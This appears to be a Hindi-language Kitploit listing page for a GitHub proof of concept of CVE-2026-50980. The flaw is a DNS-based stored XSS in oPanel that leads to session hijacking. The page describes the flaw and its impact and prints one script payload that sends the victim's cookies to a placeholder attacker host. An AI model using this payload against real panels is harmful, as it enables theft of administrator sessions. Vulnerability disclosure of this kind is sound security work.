Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-50980 — oPanel DNS-आधारित क्रॉस-साइट स्क्रिप्टिंग (XSS) और सेशन हाइजैकिंग | Kitploit
उपकरण/GitHubGitHub/bugresearch/cve-2026-50980
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षाDNS विश्लेषण
GitHubbugresearch/cve-2026-50980

CVE-2026-50980

oPanel DNS-आधारित क्रॉस-साइट स्क्रिप्टिंग (XSS) और सेशन हाइजैकिंग

रिपॉजिटरी देखें
1 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-50980: oPanel में DNS-आधारित क्रॉस-साइट स्क्रिप्टिंग (XSS) और सत्र अपहरण

अवलोकन

  • CVE ID: CVE-2026-50980
  • उत्पाद: oPanel
  • प्रभावित संस्करण: < v1.20.25
  • भेद्यता प्रकार: DNS के माध्यम से संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) / सत्र अपहरण
  • गंभीरता: उच्च (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N)

विवरण

oPanel (v1.20.25 से पहले के संस्करण) में DNS प्रतिक्रियाओं के अनुचित प्रबंधन और सैनिटाइज़ेशन के कारण क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता मौजूद है। जब पैनल किसी हमलावर-नियंत्रित नेमसर्वर के विरुद्ध DNS क्वेरी करता है (जैसे, डोमेन जानकारी प्राप्त करना, DNS प्रसार की जाँच करना, या TXT रिकॉर्ड क्वेरी करना), तो यह लौटाए गए DNS रिकॉर्ड को पर्याप्त HTML एन्कोडिंग के बिना सीधे वेब इंटरफ़ेस में प्रतिबिंबित करता है।

एक हमलावर इसका फायदा उठाकर एक दुष्ट (rogue) DNS सर्वर को TXT रिकॉर्ड क्वेरीज़ का जवाब दुर्भावनापूर्ण JavaScript पेलोड के साथ देने के लिए कॉन्फ़िगर कर सकता है। जब कोई प्रमाणित oPanel उपयोगकर्ता (जैसे व्यवस्थापक) उस पृष्ठ को देखता है जहाँ DNS प्रतिक्रिया प्रदर्शित होती है, तो पेलोड उनके ब्राउज़र सत्र के संदर्भ में निष्पादित हो जाता है।

प्रभाव

सफल शोषण हमलावर को पीड़ित के ब्राउज़र में मनमाना JavaScript निष्पादित करने की अनुमति देता है। जैसा कि प्रूफ ऑफ कॉन्सेप्ट में प्रदर्शित किया गया है, इसका उपयोग संवेदनशील प्रमाणीकरण कुकीज़ (document.cookie) चुराने के लिए किया जा सकता है, जिससे पूर्ण सत्र अपहरण और oPanel वातावरण तक अनधिकृत व्यवस्थापकीय पहुंच प्राप्त होती है।

प्रूफ ऑफ कॉन्सेप्ट (PoC)

शोषण के लिए हमलावर को एक दुर्भावनापूर्ण DNS सर्वर और बाहर निकाले गए डेटा को कैप्चर करने हेतु एक HTTP लिसनर स्थापित करना आवश्यक है।

1. हमलावर बुनियादी ढांचे की स्थापना

हमलावर UDP पोर्ट 53 पर एक दुष्ट DNS सर्वर चलाता है जो किसी भी TXT क्वेरी का जवाब XSS पेलोड के साथ देने के लिए कॉन्फ़िगर किया गया है।

दुर्भावनापूर्ण TXT रिकॉर्ड पेलोड:

root@kitploit:~
<script>new Image().src='http://<ATTACKER_IP>:<HTTP_PORT>/log?cookie='+document.cookie;</script>
टूल डाउनलोड करें